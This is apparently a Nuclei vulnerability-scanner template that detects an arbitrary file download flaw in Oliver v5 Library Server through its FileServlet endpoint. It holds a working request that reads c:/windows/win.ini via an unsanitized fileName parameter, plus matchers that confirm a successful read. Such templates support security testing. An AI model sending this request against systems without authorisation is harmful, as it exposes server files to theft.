id: oliver-library-lfi

info:
  name: Oliver Library Server v5 - Arbitrary File Download
  author: gy741
  severity: high
  description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
  reference:
    - https://www.exploit-db.com/exploits/50599
    - https://www.softlinkint.com/product/oliver/
  tags: windows,lfi,oliver

requests:
  - method: GET
    path:
      - "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and